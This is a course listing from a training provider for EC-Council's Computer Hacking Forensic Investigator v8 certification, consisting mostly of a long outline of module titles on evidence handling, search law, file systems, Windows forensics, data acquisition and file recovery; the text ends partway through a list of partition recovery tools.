EC-Council CHFI Computer Hacking Forensic Investigator v.8 Course Number: 312-49 Course Overview Computer hacking forensic investigation is the process of detecting hacking attacks and properly extracting evidence to report the crime and conduct audits to prevent future attacks. Computer forensics is simply the application of computer investigation and analysis techniques in the interests of determining potential legal evidence. Evidence might be sought in a wide range of computer crime or misuse, including but not limited to theft of trade secrets, theft of or destruction of intellectual property, and fraud. CHFI investigators can draw on an array of methods for discovering data that resides in a computer system, or recovering deleted, encrypted, or damaged file information. This course will prepare you to pass the EC0 312-49 exam and achieve Computer Hacking Forensics Investigator (CHFI) certification. Career Academy is an EC-Council endorsed training provider. We have invited the best security trainers in the industry to help us develop the ultimate training and certification program which includes everything you will need to fully prepare for and pass your certification exams. This officially endorsed product gives our students access to the exam by providing you with a Authorization Code. The EC-Council Authorization Code can be used at any Prometric center, this Authorization Code is required and mandatory for you to schedule and pay for your exam. Without this Authorization Code, Prometric will not entertain any of your requests to schedule and take the exam. Note: The cost of the exam is not included in this package. Prerequisites It is strongly recommended that students take the CEH course before beginning the CHFI program. Audience This course is of significant benefit to Police and other law enforcement personnel, Defense and Military personnel, e-Business Security professionals, Systems administrators, Legal professionals, Banking, Insurance and other professionals, Government agencies, and IT managers. Certification Exam This course prepares you for EC-Council Computer Hacking Forensics Investigator exam 31249 Course Outline Course Introduction 2m Course Introduction Module 00 - Student Introduction 6m Student Introduction CHFIv8 Course Outline EC-Council Certification Program Computer Hacking Forensic Investigator Track CHFIv8 Exam Information What Does CHFI Teach You? CHFI Class Speed Let's Start Forensics Investigation! Module 01 - Computer Forensics in Today's World Module Flow: Computer Forensics Forensics Science Computer Forensics Security Incident Report Aspects of Organizational Security Evolution of Computer Forensics (Cont'd) Evolution of Computer Forensics Objective of Computer Forensics Need for Computer Forensics Module Flow: Forensics Readiness Benefits of Forensics Readiness Goals of Forensics Readiness Forensics Readiness Planning Module Flow: Cyber Crimes Cyber Crime Computer Facilitated Crimes Modes of Attacks Examples of Cyber Crime (Cont'd) Examples of Cyber Crime Types of Computer Crimes Cyber Criminals 1h 8m Organized Cyber Crime: Organizational Chart How Serious are Different Types of Incidents? Disruptive Incidents to the Business Cost Expenditure Responding to the Security Incident Module Flow: Cyber Crime Investigation Cyber Crime Investigation Key Steps in Forensics Investigation (Cont'd) Key Steps in Forensics Investigation Rules of Forensics Investigation Need for Forensics Investigator Role of Forensics Investigator Accessing Computer Forensics Resources Role of Digital Evidence Module Flow: Corporate Investigations Understanding Corporate Investigations Approach to Forensics Investigation: A Case Study (Cont'd) Approach to Forensics Investigation: A Case Study Instructions for the Forensic Investigator to Approach the Crime Scene Why and When Do You Use Computer Forensics? Enterprise Theory of Investigation (ETI) Legal Issues Reporting the Results Module Flow: Reporting a Cyber Crime Why you Should Report Cybercrime? Reporting Computer-Related Crimes (Cont'd) Reporting Computer-Related Crimes Person Assigned to Report the Crime When and How to Report an Incident? Who to Contact at the Law Enforcement Federal Local Agents Contact (Cont'd) Federal Local Agents Contact More Contacts CIO Cyberthreat Report Form Module 01 Review Module 02 - Computer Forensics Investigation Process Computer Forensics Investigation Process Investigating Computer Crime Before the Investigation Build a Forensics Workstation Building the Investigation Team People Involved in Computer Forensics Review Policies and Laws Forensics Laws (Cont'd) Forensics Laws 1h 20m Notify Decision Makers and Acquire Authorization Risk Assessment Build a Computer Investigation Toolkit Steps to Prepare for a Computer Forensics Investigation (Cont'd) Steps to Prepare for a Computer Forensics Investigation Computer Forensics Investigation Methodology: Obtain Search Warrant Obtain Search Warrant Example of Search Warrant Searches Without a Warrant Computer Forensics Investigation Methodology: Evaluate and Secure the Scene Forensics Photography Gather the Preliminary Information at the Scene First Responder Computer Forensics Investigation Methodology: Collect the Evidence Collect Physical Evidence Evidence Collection Form Collect Electronic Evidence (Cont'd) Collect Electronic Evidence Guidelines for Acquiring Evidence Computer Forensics Investigation Methodology: Secure the Evidence Secure the Evidence Evidence Management Chain of Custody Chain of Custody Form Computer Forensics Investigation Methodology: Acquire the Data Original Evidence Should NEVER Be Used for Analysis Duplicate the Data (Imaging) Verify Image Integrity Demo - HashCalc MD5 Hash Calculators: HashCalc, MD5 Calculator and HashMyFiles Recover Lost or Deleted Data Data Recovery Software Computer Forensics Investigation Methodology: Analyze the Data Data Analysis Data Analysis Tools Computer Forensics Investigation Methodology: Assess Evidence and Case Evidence Assessment Case Assessment (Cont'd) Case Assessment Processing Location Assessment Best Practices to Assess the Evidence Computer Forensics Investigation Methodology: Prepare the Final Report Documentation in Each Phase Gather and Organize Information Writing the Investigation Report (Cont'd) Writing the Investigation Report Sample Report (1 of 7) Sample Report (2 of 7) Sample Report (3 of 7) Sample Report (4 of 7) Sample Report (5 of 7) Sample Report (6 of 7) Sample Report (7 of 7) Computer Forensics Investigation Methodology: Testify as an Expert Witness Expert Witness Testifying in the Court Room Closing the Case Maintaining Professional Conduct Investigating a Company Policy Violation Computer Forensics Service Providers (Cont'd) Computer Forensics Service Providers Module 02 Review Module 03 - Searching and Seizing Computers 1h 27m Module Flow: Searching and Seizing Computers without a Warrant Searching and Seizing Computers without a Warrant Fourth Amendment's "Reasonable Expectation of Privacy" in Cases Involving Computers: Principles Reasonable Expectation of Privacy in Computers as Storage Devices Reasonable Expectation of Privacy and Third-Party Possession Private Searches Use of Technology to Obtain Information Exceptions to the Warrant Requirement in Cases Involving Computers Consent Scope of Consent Third-Party Consent Implied Consent Exigent Circumstances Plain View Search Incident to a Lawful Arrest Inventory Searches Border Searches International Issues Special Case: Workplace Searches Private Sector Workplace Searches Public-Sector Workplace Searches Module Flow: Searching and Seizing Computers with a Warrant Searching and Seizing Computers with a Warrant Successful Search with a Warrant Basic Strategies for Executing Computer Searches When Hardware Is Itself Contraband, Evidence, or an Instrumentality or Fruit of Crime When Hardware Is Merely a Storage Device for Evidence of Crime The Privacy Protection Act The Terms of the Privacy Protection Act Application of the PPA to Computer Searches and Seizures (Cont'd) Application of the PPA to Computer Searches and Seizures Civil Liability Under the Electronic Communications Privacy Act (ECPA) Considering the Need for Multiple Warrants in Network Searches No-Knock Warrants Sneak-and-Peek Warrants Privileged Documents Drafting the Warrant and Affidavit Accurately and Particularly Describe the Property to Be Seized in the Warrant and/or Attachments Defending Computer Search Warrants Against Challenges Based on the "Things to be Seized" Establish Probable Cause in the Affidavit Explanation of the Search Strategy and Practical & Legal Considerations Post-Seizure Issues Searching Computers Already in Law Enforcement Custody The Permissible Time Period for Examining Seized Computers Rule 41(e) Motions for Return of Property Module Flow: The Electronic Communications Privacy Act The Electronic Communications Privacy Act Providers of Electronic Communication Service vs. Remote Computing Service Classifying Types of Information Held by Service Providers Compelled Disclosure Under ECPA Voluntary Disclosure Working with Network Providers Module Flow: Electronic Surveillance in Communications Networks Electronic Surveillance in Communications Networks Content vs. Addressing Information The Pen/Trap Statute The Wiretap Statute ("Title III") Exceptions to Title III Remedies For Violations of Title III and the Pen/Trap Statute Module Flow: Evidence Evidence (Cont'd) Evidence Authentication Hearsay Other Issues Module 03 Review Module Flow: Digital Data Definition of Digital Evidence Increasing Awareness of Digital Evidence Challenging Aspects of Digital Evidence The Role of Digital Evidence Characteristics of Digital Evidence Fragility of Digital Evidence Anti-Digital Forensics (ADF) Module Flow: Types of Digital Data Types of Digital Data (Cont'd) Types of Digital Data Module Flow: Rules of Evidence Rules of Evidence Best Evidence Rule Federal Rules of Evidence (Cont'd) Federal Rules of Evidence International Organization on Computer Evidence (IOCE) IOCE International Principles for Digital Evidence Scientific Working Group on Digital Evidence (SWGDE) SWGDE Standards for the Exchange of Digital Evidence (Cont'd) SWGDE Standards for the Exchange of Digital Evidence Module Flow: Electronic Devices: Types and Collecting Potential Evidence Electronic Devices: Types and Collecting Potential Evidence (Cont'd) Electronic Devices: Types and Collecting Potential Evidence Module Flow: Digital Evidence Examination Process Digital Evidence Examination Process - Evidence Assessment Evidence Assessment Prepare for Evidence Acquisition Digital Evidence Examination Process - Evidence Acquisition Preparation for Searches Seizing the Evidence Imaging Demo - Disk Sterilization with DD Bit-Stream Copies Write Protection Evidence Acquisition Evidence Acquisition from Crime Location Acquiring Evidence from Storage Devices Demo - Utilizing HD PARM for HD Information Collecting Evidence (Cont'd) Collecting Evidence Collecting Evidence from RAM (Cont'd) Collecting Evidence from RAM Collecting Evidence from a Standalone Network Computer Chain of Custody Chain of Evidence Form Digital Evidence Examination Process - Evidence Preservation Preserving Digital Evidence: Checklist (Cont'd) Preserving Digital Evidence: Checklist Preserving Removable Media (Cont'd) Preserving Removable Media Handling Digital Evidence Store and Archive Digital Evidence Findings Digital Evidence Examination Process - Evidence Examination and Analysis DO NOT WORK on the Original Evidence Evidence Examination (Cont'd) Evidence Examination Physical Extraction Logical Extraction Analyze Host Data Analyze Storage Media Analyze Network Data Analysis of Extracted Data Timeframe Analysis Data Hiding Analysis Application and File Analysis Ownership and Possession Digital Evidence Examination Process - Evidence Documentation and Reporting Documenting the Evidence Evidence Examiner Report Final Report of Findings Computer Evidence Worksheet (Cont'd) Computer Evidence Worksheet Hard Drive Evidence Worksheet (Cont'd) Hard Drive Evidence Worksheet Removable Media Worksheet Module Flow: Electronic Crime and Digital Evidence Consideration by Crime Category Electronic Crime and Digital Evidence Consideration by Crime Category (Cont'd) Electronic Crime and Digital Evidence Consideration by Crime Category Module 04 Review Module 05 - First Responder Procedures Module Flow: First Responder Electronic Evidence First Responder Roles of First Responder Electronic Devices: Types and Collecting Potential Evidence (Cont' d) Electronic Devices: Types and Collecting Potential Evidence Module Flow: First Responder Toolkit First Responder Toolkit Creating a First Responder Toolkit Evidence Collecting Tools and Equipment (Cont'd) 1h 59m Evidence Collecting Tools and Equipment Module Flow: First Response Basics First Response Rule Incident Response: Different Situations First Response for System Administrators First Response by Non-Laboratory Staff First Response by Laboratory Forensics Staff (Cont'd) First Response by Laboratory Forensics Staff Module Flow: Securing and Evaluating Electronic Crime Scene Securing and Evaluating Electronic Crime Scene: A Checklist (Cont'd) Securing and Evaluating Electronic Crime Scene: A Checklist Securing the Crime Scene Warrant for Search and Seizure Planning the Search and Seizure (Cont'd) Planning the Search and Seizure Initial Search of the Scene Health and Safety Issues Module Flow: Conducting Preliminary Interviews Questions to Ask When Client Calls the Forensic Investigator Consent Sample of Consent Search Form Witness Signatures Conducting Preliminary Interviews Conducting Initial Interviews Witness Statement Checklist Module Flow: Documenting Electronic Crime Scene Documenting Electronic Crime Scene Photographing the Scene Sketching the Scene Video Shooting the Crime Scene Module Flow: Collecting and Preserving Electronic Evidence Collecting and Preserving Electronic Evidence (Cont'd) Collecting and Preserving Electronic Evidence Order of Volatility Dealing with Powered On Computers (Cont'd) Demo - Imaging RAM Demo - Parsing RAM Dealing with Powered On Computers Dealing with Powered Off Computers Dealing with Networked Computer Dealing with Open Files and Startup Files Operating System Shutdown Procedure (Cont'd) Operating System Shutdown Procedure Example Computers and Servers Preserving Electronic Evidence Seizing Portable Computers Switched On Portables Collecting and Preserving Electronic Evidence Wrap-up Module Flow: Packaging and Transporting Electronic Evidence Evidence Bag Contents List Packaging Electronic Evidence Exhibit Numbering Transporting Electronic Evidence Handling and Transportation to the Forensics Laboratory Storing Electronic Evidence Chain of Custody Simple Format of the Chain of Custody Document Chain of Custody Forms (Cont'd) Chain of Custody Forms Chain of Custody on Property Evidence Envelope/Bag and Sign-out Sheet Demo - Hardware Inventories Module Flow: Reporting the Crime Scene Reporting the Crime Scene Note Taking Checklist (Cont'd) Note Taking Checklist First Responder Common Mistakes Module 05 Review Module 06 - Computer Forensics Lab Module Flow: Setting a Computer Forensics Lab Computer Forensics Lab Planning for a Forensics Lab Budget Allocation for a Forensics Lab Physical Location Needs of a Forensics Lab Structural Design Considerations Environmental Conditions Electrical Needs Communication Needs Work Area of a Computer Forensics Lab Ambience of a Forensics Lab Ambience of a Forensics Lab: Ergonomics Physical Security Recommendations Fire-Suppression Systems Evidence Locker Recommendations 2h 5m Computer Forensic Investigator Law Enforcement Officer Lab Director Forensics Lab Licensing Requisite Features of the Laboratory Imaging System Technical Specifications of the Laboratory Based Imaging System Forensics Lab (1 of 3) Forensics Lab (2 of 3) Forensics Lab (3 of 3) Auditing a Computer Forensics Lab (Cont'd) Auditing a Computer Forensics Lab Recommendations to Avoid Eyestrain Module Flow: Investigative Services in Forensics Computer Forensics Investigative Services Computer Forensic Investigative Service Sample Computer Forensics Services: PenrodEllis Forensic Data Discovery Data Destruction Industry Standards Computer Forensics Services (Cont'd) Computer Forensics Services Module Flow: Computer Forensics Hardware Equipment Required in a Forensics Lab Forensic Workstations Basic Workstation Requirements in a Forensics Lab Stocking the Hardware Peripherals Paraben Forensics Hardware: Handheld First Responder Kit Paraben Forensics Hardware: Wireless StrongHold Bag Paraben Forensics Hardware: Wireless StrongHold Box Paraben Forensics Hardware: Passport StrongHold Bag Paraben Forensics Hardware: Device Seizure Toolbox Paraben Forensics Hardware: Project-a-Phone Paraben Forensics Hardware: Lockdown Paraben Forensics Hardware: iRecovery Stick Paraben Forensics Hardware: Data Recovery Stick Paraben Forensics Hardware: Chat Stick Paraben Forensics Hardware: USB Serial DB9 Adapter Paraben Forensics Hardware: Mobile Field Kit Portable Forensic Systems and Towers: Forensic Air-Lite VI MK III Laptop Portable Forensic Systems and Towers: Original Forensic Tower II and Forensic Solid Steel Tower Portable Forensic Workhorse V: Tableau 335 Forensic Drive Bay Controller Portable Forensic Systems and Towers: Forensic Air-Lite IV MK II Portable Forensic Systems and Towers: Forensic Air-Lite V MK III Portable Forensic Systems and Towers: Forensic Tower IV Duel Xeon Portable Forensic Systems and Towers: Ultimate Forensic Machine Forensic Write Protection Devices and Kits: Ultimate Forensic Write Protection Kit II-ES Tableau T3u Forensic SATA Bridge Write Protection Kit Tableau T8 Forensic USB Bridge Kit/Addonics Mini DigiDrive READ ONLY 12-in-1 Flash Reader Tableau TACC 1441 Hardware Accelerator Multiple TACC1441 Units Tableau TD1 Forensic Duplicator Power Supplies and Switches Digital Intelligence Forensic Hardware: FRED SR (Duel Xeon) Digital Intelligence Forensic Hardware: FRED-L Digital Intelligence Forensic Hardware: FRED SC Digital Intelligence Forensic Hardware: Forensic Recovery of Evidence Data Center (FREDC) Digital Intelligence Forensic Hardware: Rack-A-TACC Digital Intelligence Forensic Hardware: FREDDIE Digital Intelligence Forensic Hardware: UltraKit Digital Intelligence Forensic Hardware: UltraBay II Digital Intelligence Forensic Hardware: UltraBlock SCSI Digital Intelligence Forensic Hardware: Micro Forensic Recovery of Evidence Device Digital Intelligence Forensic Hardware: HardCopy 3P Wiebetech: Forensics DriveDock v4 Wiebetech: Forensic UltraDock v4 Wiebetech: Drive eRazer Wiebetech: v4 Combo Adapters Wiebetech: ProSATA SS8 Wiebetech: HotPlug CelleBrite: UFED System CelleBrite: UFED Physical Pro CelleBrite: UFED Ruggedized DeepSpar: Disk Imager Forensic Edition DeepSpar: 3D Data Recovery Phase 1 Tool: PC-3000 Drive Restoration System Phase 2 Tool: DeepSpar Disk Imager Phase 3 Tool: PC-3000 Data Extractor InfinaDyne Forensic Products: Robotic Loader Extension for CD/DVD Inspector InfinaDyne Forensic Products: Robotic System Status Light Image MASSter: Solo-4 (Super Kit) Image MASSter: RoadMASSter- 3 Image MASSter: WipeMASSter Image MASSter: WipePRO Image MASSter: Rapid Image 7020CS IT Logicube: Forensic MD5 Logicube: Forensic Talon Logicube: Portable Forensic Lab Logicube: CellDEK Logicube: Forensic Quest-2 Logicube: NETConnect Logicube: RAID I/O Adapter Logicube: GPStamp Logicube: OmniPort Logicube: Desktop WritePROtects Logicube: USB Adapter Logicube: CloneCard Pro Logicube: EchoPlus OmniClone IDE Laptop Adapters Logicube: Cables VoomTech: HardCopy 3P VoomTech: SHADOW 2 Module Flow: Computer Forensics Software Basic Software Requirements in a Forensics Lab Main Operating System and Application Inventories Imaging Software: R-drive Image Demo - R-Drive Image Imaging Software: P2 eXplorer Pro Imaging Software: AccuBurn-R for CD/DVD Inspector Imaging Software: Flash Retriever Forensic Edition File Conversion Software: FileMerlin File Conversion Software: SnowBatch File Conversion Software: Zamzar File Viewer Software: File Viewer File Viewer Software: Quick View Plus 11 Standard Edition Demo - File Viewers Analysis Software: P2 Commander P2 Commander Screenshot Analysis Software: DriveSpy Analysis Software: SIM Card Seizure Analysis Software: CD/DVD Inspector Analysis Software: Video Indexer (Vindex) Monitoring Software: Device Seizure Device Seizure Screenshots Monitoring Software: Deployable P2 Commander (DP2C) Monitoring Software: ThumbsDisplay ThumbsDisplay Screenshot Monitoring Software: Email Detective Computer Forensics Software: DataLifter Computer Forensics Software: X-Ways Forensics Demo - X-Ways Forensics Computer Forensics Software: LiveWire Investigator Module 06 Review Module 07 - Understanding Hard Disks and File Systems Module Flow: Hard Disk Drive Overview Disk Drive Overview (Cont'd) Disk Drive Overview 3h 59m Hard Disk Drive Solid-State Drive (SSD) Physical Structure of a Hard Disk (Cont'd) Physical Structure of a Hard Disk Logical Structure of Hard Disk Types of Hard Disk Interfaces Hard Disk Interfaces: ATA Hard Disk Interfaces: SCSI (Cont'd) Hard Disk Interfaces: SCSI Hard Disk Interfaces: IDE/EIDE Hard Disk Interfaces: USB Hard Disk Interfaces: Fibre Channel Disk Platter Tracks Track Numbering Sector Advanced Format: Sectors Sector Addressing Cluster Cluster Size Changing the Cluster Size Demo - Cluster Size Slack Space ( Cont'd) Slack Space Demo - Slack Space Lost Clusters Bad Sector Hard Disk Data Addressing Disk Capacity Calculation Demo - Calculating Disk Capacity Measuring the Performance of the Hard Disk Module Flow: Disk Partitions and Boot Process Disk Partitions Demo - Partitioning Linux Master Boot Record Structure of a Master Boot Record (Cont'd) Demo - Backing Up the MBR Structure of a Master Boot Record What is the Booting Process? Essential Windows System Files Windows 7 Boot Process (Cont'd) Windows 7 Boot Process Macintosh Boot Process (Cont'd) Macintosh Boot Process http://www.bootdisk.com Module Flow: Understanding File Systems Understanding File Systems Types of File Systems List of Disk File Systems (Cont'd) List of Disk File Systems List of Network File Systems List of Special Purpose File Systems List of Shared Disk File Systems Windows File Systems Popular Windows File Systems File Allocation Table (FAT) FAT File System Layout FAT Partition Boot Sector FAT Structure FAT Folder Structure Directory Entries and Cluster Chains Filenames on FAT Volumes Examining FAT FAT32 New Technology File System (NTFS) (Cont'd) NTFS (Cont'd) NTFS NTFS Architecture NTFS System Files NTFS Partition Boot Sector Cluster Sizes of NTFS Volume NTFS Master File Table (MFT) (Cont'd) NTFS Master File Table (MFT) Metadata Files Stored in the MFT NTFS Files and Data Storage NTFS Attributes NTFS Data Stream (Cont'd) NTFS Data Stream NTFS Compressed Files Setting the Compression State of a Volume Encrypting File Systems (EFS) Components of EFS Operation of Encrypting File System EFS Attribute Encrypting a File EFS Recovery Key Agent (Cont'd) EFS Recovery Key Agent Tool: Advanced EFS Data Recovery Tool: EFS Key Sparse Files Deleting NTFS Files Registry Data (Cont'd) Registry Data Examining Registry Data FAT vs. NTFS Linux File Systems Popular Linux File Systems Linux File System Architecture Ext2 (Cont'd) Ext2 Ext3 (Cont'd) Ext3 Mac OS X File Systems HFS vs. HFS Plus HFS HFS Plus HFS Plus Volumes HFS Plus Journal Sun Solaris 10 File System: ZFS CD-ROM / DVD File System CDFS Demo - Multi-sessions Discs Module Flow: RAID Storage System RAID Storage System RAID Level 0: Disk Striping RAID Level 1: Disk Mirroring RAID Level 3: Disk Striping with Parity RAID Level 5: Block Interleaved Distributed Parity RAID Level 10: Blocks Striped and Mirrored RAID Level 50: Mirroring and Striping across Multiple RAID Levels Different RAID Levels Comparing RAID Levels Recover Data from Unallocated Space Using File Carving Process Module Flow: File System Analysis Using the Sleuth Kit (TSK) Tool: The Sleuth Kit (TSK) The Sleuth Kit (TSK): fsstat The Sleuth Kit (TSK): istat (1 of 4) The Sleuth Kit (TSK): istat (2 of 4) The Sleuth Kit (TSK): istat (3 of 4) The Sleuth Kit (TSK): istat (4 of 4) The Sleuth Kit (TSK): fls and img_stat Demo - TSK and Autopsy Module 07 Review Module 08 - Windows Forensics 3h 37m Module Flow: Collecting Volatile Information Volatile Information System Time Logged-On Users Logged-On Users: PsLoggedOn Tool Logged-On Users: net sessions Command Logged-On Users: LogonSessions Tool Open Files Open Files: net file Command Open Files: PsFile Utility Open Files: Openfiles Command Network Information (Cont'd) Network Information Network Connections (Cont'd) Demo - Netstat Command Network Connections Process Information (Cont'd) Process Information Process-to-Port Mapping (Cont'd) Process-to-Port Mapping Process Memory Network Status (Cont'd) Demo - ipconfig Network Status Other Important Information (Cont'd) Demo - Clipboard Viewer Other Important Information Module Flow: Collecting Non-Volatile Information Non-Volatile Information Examine File Systems Registry Settings Microsoft Security ID Event Logs Index.dat File (Cont'd) Index.dat File Demo - Grabbing Registry Files Devices and Other Information Slack Space Virtual Memory Swap File Windows Search Index Collecting Hidden Partition Information Demo - Gparted Hidden ADS Streams Investigating ADS Streams: StreamArmor Other Non-Volatile Information Module Flow: Windows Memory Analysis Memory Dump (Cont'd) Memory Dump EProcess Structure Process Creation Mechanism Parsing Memory Contents Parsing Process Memory Extracting the Process Image (Cont'd) Extracting the Process Image Collecting Process Memory Module Flow: Windows Registry Analysis Inside the Registry (Cont'd) Inside the Registry Registry Structure within a Hive File The Registry as a Log File Registry Analysis System Information (Cont'd) System Information TimeZone Information Shares Audit Policy Wireless SSIDs Autostart Locations System Boot User Login User Activity Enumerating Autostart Registry Locations USB Removable Storage Devices (Cont'd) USB Removable Storage Devices Mounted Devices (Cont'd) Mounted Devices Finding Users (Cont'd) Finding Users: Screenshots Tracking User Activity The UserAssist Keys MRU Lists (Cont'd) MRU Lists Search Assistant Connecting to Other Systems Analyzing Restore Point Registry Settings (Cont'd) Analyzing Restore Point Registry Settings Determining the Startup Locations (Cont'd) Determining the Startup Locations Demo - Reg Ripper Module Flow: Cache, Cookie, and History Analysis Cache, Cookie, and History Analysis in IE Cache, Cookie, and History Analysis in Firefox Cache, Cookie, and History Analysis in Chrome Analysis Tool: IECookiesView Analysis Tool: IECacheView Analysis Tool: IEHistoryView Analysis Tool: MozillaCookiesView Analysis Tool: MozillaCacheView Analysis Tool: MozillaHistoryView Analysis Tool: ChromeCookiesView Analysis Tool: ChromeCacheView Analysis Tool: ChromeHistoryView Module Flow: MD5 Calculation Message Digest Function: MD5 Why MD5 Calculation? MD5 Hash Calculators: HashCalc, MD5 Calculator and HashMyFiles MD5 Checksum Verifier ChaosMD5 Module Flow: Windows File Analysis Recycle Bin (Cont'd) Recycle Bin System Restore Points (Rp.log Files) System Restore Points (Change.log.x Files) Prefetch Files (Cont'd) Prefetch Files Shortcut Files Word Documents PDF Documents Image Files File Signature Analysis NTFS Alternate Data Streams Executable File Analysis Documentation Before Analysis Static Analysis Process Search Strings PE Header Analysis Import Table Analysis Export Table Analysis Dynamic Analysis Process Creating Test Environment Collecting Information Using Tools Process of Testing the Malware Module Flow: Metadata Investigation Metadata Types of Metadata (Cont'd) Types of Metadata Metadata in Different File Systems (Cont'd) Metadata in Different File Systems Metadata in PDF Files Metadata in Word Documents Tool: Metadata Analyzer Module Flow: Text Based Logs Understanding Events Event Logon Types (Cont'd) Event Logon Types Event Record Structure (Cont'd) Event Record Structure Vista Event Logs (Cont'd) Vista Event Logs: Screenshots IIS Logs Parsing IIS Logs (Cont'd) Parsing IIS Logs Parsing FTP Logs FTP sc-status Codes (Cont'd) FTP sc-status Codes Parsing DHCP Server Logs (Cont'd) Parsing DHCP Server Logs Parsing Windows Firewall Logs Using the Microsoft Log Parser Module Flow: Other Audit Events Evaluating Account Management Events (Cont'd) Evaluating Account Management Events Examining Audit Policy Change Events Examining System Log Entries Examining Application Log Entries Examining Application Log Entries (Screenshot) Module Flow: Forensic Analysis of Event Logs Searching with Event Viewer Using EnCase to Examine Windows Event Log Files Windows Event Log Files Internals Module Flow: Windows Password Issues Understanding Windows Password Storage (Cont'd) Understanding Windows Password Storage Cracking Windows Passwords Stored on Running Systems (Cont'd) Cracking Windows Passwords Stored on Running Systems Exploring Windows Authentication Mechanisms LanMan Authentication Process NTLM Authentication Process Kerberos Authentication Process Sniffing and Cracking Windows Authentication Exchanges Cracking Offline Passwords Module Flow: Forensics Tools Windows Forensics Tool: OS Forensics Windows Forensics Tool: Helix3 Pro Helix3 Pro Screenshot Integrated Windows Forensics Software: X-Ways Forensics X-Ways Forensics Screenshot X-Ways Trace Windows Forensic Toolchest (WFT) Built-in Tool: Sigverif Computer Online Forensic Evidence Extractor (COFEE) System Explorer Tool: System Scanner SecretExplorer Registry Viewer Tool: Registry Viewer Registry Viewer Tool: RegScanner Registry Viewer Tool: Alien Registry Viewer MultiMon CurrProcess Process Explorer Security Task Manager PrcView ProcHeapViewer Memory Viewer Tool: PMDump Word Extractor Belkasoft Evidence Center Belkasoft Browser Analyzer Metadata Assistant HstEx XpoLog Center Suite XpoLog Center Suite Screenshot LogViewer Pro Event Log Explorer LogMeister ProDiscover Forensics PyFlag LiveWire Investigator ThumbsDisplay ThumbsDisplay Screenshot DriveLook Module 08 Review Module 09 - Data Acquisition and Duplication 2h 53m Module Flow: Data Acquisition and Duplication Concepts Data Acquisition Forensic and Procedural Principles Types of Data Acquisition Systems Data Acquisition Formats (Cont'd) Data Acquisition Formats Bit Stream vs. Backups Why to Create a Duplicate Image? Issues with Data Duplication Data Acquisition Methods (Cont'd) Data Acquisition Methods Determining the Best Acquisition Method (Cont'd) Determining the Best Acquisition Method Contingency Planning for Image Acquisitions (Cont'd) Contingency Planning for Image Acquisitions Data Acquisitions Mistakes Module Flow: Data Acquisition Types Rules of Thumb Static Data Acquisition Collecting Static Data Demo - Forensic Imaging Using Linux Demo - Forensic Imaging Using Windows Static Data Collection Process Live Data Acquisition Why Volatile Data is Important? Volatile Data (Cont'd) Volatile Data Order of Volatility Common Mistakes in Volatile Data Collection Volatile Data Collection Methodology (Cont'd) Volatile Data Collection Methodology Basic Steps in Collecting Volatile Data Types of Volatile Information (Cont'd) Types of Volatile Information Demo - WinTaylors Module Flow: Disk Acquisition Tool Requirements Disk Imaging Tool Requirements Disk Imaging Tool Requirements: Mandatory (Cont'd) Disk Imaging Tool Requirements: Mandatory Disk Imaging Tool Requirements: Optional (Cont'd) Disk Imaging Tool Requirements: Optional Module Flow: Validation Methods Validating Data Acquisitions Linux Validation Methods (Cont'd) Linux Validation Methods Windows Validation Methods Module Flow: Raid Data Acquisition Understanding RAID Disks (Cont'd) Understanding RAID Disks Acquiring RAID Disks (Cont'd) Acquiring RAID Disks Remote Data Acquisition Module Flow: Acquisition Best Practices Acquisition Best Practices (Cont'd) Acquisition Best Practices Module Flow: Data Acquisition Software Tools Acquiring Data on Windows Acquiring Data on Linux dd Command dcfldd Command Extracting the MBR Netcat Command EnCase Forensic EnCase Forensic Screenshot Analysis Software: DriveSpy ProDiscover Forensics AccessData FTK Imager Mount Image Pro Data Acquisition Toolbox SafeBack ILookPI ILookPI Screenshot RAID Recovery for Windows R-Tools R-Studio F-Response PyFlag LiveWire Investigator ThumbsDisplay ThumbsDisplay Screenshot DataLifter X-Ways Forensics R-drive Image Demo - Forensic Imaging DriveLook DiskExplorer P2 eXplorer Pro Flash Retriever Forensic Edition Module Flow: Data Acquisition Hardware Tools US-LATT Image MASSter: Solo-4 (Super Kit) Image MASSter: RoadMASSter- 3 Tableau TD1 Forensic Duplicator Logicube: Forensic MD5 Logicube: Portable Forensic Lab Logicube: Forensic Talon Logicube: RAID I/O Adapter DeepSpar: Disk Imager Forensic Edition Logicube: USB Adapter Disk Jockey PRO Logicube: Forensic Quest-2 Logicube: CloneCard Pro Logicube: EchoPlus Paraben Forensics Hardware: Chat Stick Image MASSter: Rapid Image 7020CS IT Digital Intelligence Forensic Hardware: UltraKit Digital Intelligence Forensic Hardware: UltraBay II Digital Intelligence Forensic Hardware: UltraBlock SCSI Digital Intelligence Forensic Hardware: HardCopy 3P Wiebetech: Forensics DriveDock v4 Wiebetech: Forensics UltraDock v4 Image MASSter: WipeMASSter Image MASSter: WipePRO Portable Forensic Systems and Towers: Forensic Air-Lite V MK III Forensic Tower IV Dual Xeon Digital Intelligence Forensic Hardware: FREDDIE DeepSpar: 3D Data Recovery Phase 1 Tool: PC-3000 Drive Restoration System Phase 2 Tool: DeepSpar Disk Imager Phase 3 Tool: PC-3000 Data Extractor Logicube: Cables Logicube: Adapters Logicube: GPStamp Logicube: OmniPort Logicube: CellDEK Paraben Forensics Hardware: Project-a-Phone Paraben Forensics Hardware: Mobile Field Kit Paraben Forensics Hardware: iRecovery Stick CelleBrite: UFED System CelleBrite: UFED Physical Pro Module 09 Review Module 10 - Recovering Deleted Files and Deleted Partition Module Flow: Recovering the Deleted Files Deleting Files What Happens When a File is Deleted in Windows? 1h 21m Recycle Bin in Windows (Cont'd) Recycle Bin in Windows Storage Locations of Recycle Bin in FAT and NTFS Systems How the Recycle Bin Works (Cont'd) How the Recycle Bin Works Demo - Recycle Bins Damaged or Deleted INFO File Damaged Files in Recycle Bin Folder Damaged Recycle Folder File Recovery in Mac OS X (Cont'd) File Recovery in Mac OS X File Recovery in Linux Module Flow: File Recovery Tools for Windows Recover My Files EASEUS Data Recovery Wizard PC INSPECTOR File Recovery Demo - PC INSPECTOR File Recovery Recuva DiskDigger Handy Recovery Quick Recovery Stellar Phoenix Windows Data Recovery Tools to Recover Deleted Files Module Flow: File Recovery Tools for Mac Mac File Recovery Mac Data Recovery Boomerang Data Recovery Software VirtualLab File Recovery Tools for Mac OS X Module Flow: File Recovery Tools for Linux R-Studio for Linux Quick Recovery for Linux Kernal for Linux Data Recovery TestDisk for Linux Demo - File Carving Module Flow: Recovering the Deleted Partitions Disk Partition Deletion of Partition Recovery of the Deleted Partition (Cont'd) Recovery of the Deleted Partition Module Flow: Partition Recovery Tools Active@ Partition Recovery for Windows Acronis Recovery Expert DiskInternals Partition Recovery 